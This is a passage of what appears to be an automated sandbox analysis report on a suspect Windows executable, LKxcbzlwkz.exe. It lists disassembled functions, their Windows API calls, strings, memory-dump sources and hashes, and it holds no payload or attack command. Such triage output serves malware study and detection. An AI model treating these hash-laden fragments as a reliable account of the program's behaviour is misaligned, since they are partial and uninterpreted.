                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                                                                                                                            Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                                                                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                                                                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                                                                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3771399671-0
                                                                                                                                                                                                                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                                                                                                                                            Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                                                                                                            Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                            • API String ID: 0-1603158881
                                                                                                                                                                                                                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                                                                                                            Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00448603
                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 161812096-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                                                                                                                            Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\LKxcbzlwkz.exe), ref: 00434057
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                                                                                                            • C:\Users\user\Desktop\LKxcbzlwkz.exe, xrefs: 00434040
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 3648134473-2680183623
                                                                                                                                                                                                                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                                                                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                                                                                                                            Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 08b0a7904e5f174d8e424edd016ef1ca69a0848a79d97068c4559c38c9dcc648
                                                                                                                                                                                                                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08b0a7904e5f174d8e424edd016ef1ca69a0848a79d97068c4559c38c9dcc648
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                                                                                                                                            Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 978794511-0
                                                                                                                                                                                                                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                                                                                                                                            Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                                                                                                            Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                                                                                                            Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$_memcmp
                                                                                                                                                                                                                                                            • String ID: '$\$h
                                                                                                                                                                                                                                                            • API String ID: 2205784470-1303700344
                                                                                                                                                                                                                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                                                                                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                                                                                                                                                            Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                                                                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045EC33
